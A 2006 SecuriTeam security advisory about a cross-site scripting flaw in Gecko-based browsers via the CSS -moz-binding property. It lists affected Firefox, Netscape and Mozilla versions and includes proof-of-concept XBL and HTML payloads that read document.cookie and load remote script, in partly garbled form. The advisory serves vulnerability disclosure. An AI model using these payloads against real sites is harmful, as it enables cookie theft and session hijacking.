From: SecuriTeam <>
To: [email protected]
Date: 5 Feb 2006 14:06:21 +0200
Subject: [NEWS] Gecko Based Browsers -moz-binding XSS
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Gecko Based Browsers -moz-binding XSS
" <> XBL is a markup language
for describing bindings that can be attached to elements in other
documents." "The value of the
<> -moz-binding
property is a set of URLs that identify specific bindings. An individual
URL in the set consists of the binding document's URL and the binding's
document-unique identifier."
By crafting special XBL code, attackers can execute XSS using the
-moz-binding option on Gecko based web browsers.
Vulnerable Systems:
* Mozilla Firefox 1.5 and prior
* Mozilla Firefox 1.0 and above
* Netscape version 8.1 and prior
* Mozilla Suite version 1.7.12 and prior
* Mozilla Seamonkey 1.0
Gecko based browsers uses the CSS option -moz-binding in order to bind XBL
code from additional locations including remote hosts.
Attackers can use the -moz-binding option in order to inject Javascript
code and to perform a cross site scripting attack from remote location.
Proof of Concept:
Cookie reading:
< !--
this must be served with Content-type: text/xml or similar
-- >
< bindings>
< binding id="exploit">
< implementation>
< constructor>
function exploitMe( element ) {
element.innerHTML = "Attempting to read cookie
var data;
try {
data = document.cookie || "No cookie data.";
} catch( e ) {
data = "Unable to read cookie."
element.innerHTML = data; = "green";
exploitMe( this );
< / constructor>
< / implementation>
< / binding>
< / bindings>
Remote loading of script file:
< ! DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
< html xmlns="">
< head>
< meta http-equiv="Content-Type" content="text/html;
charset=utf-8" />
< title>Cookie Exploit< /title>
< / head>
< body>
< h1>Cookie Exploit using CSS< / h1>
< p style="color: red; -moz-binding:
behavior: url(;">
This is a paragraph with inline exploit CSS.
The CSS executes JavaScript that can read cookies.
< / p>
< / body>
< / html>
CVE Information:
Disclosure Timeline:
1-Feb-2006 - Vulnerability researched and confirmed
2-Feb-2006 - Detailed research
2-Feb-2006 - Vendor contacted
2-Feb-2006 - Security companies and several CERT units contacted
The information has been provided by <>
Juha-Matti Laurio.
The bug report can be found at:
A blog about the vulnerability can be found at:
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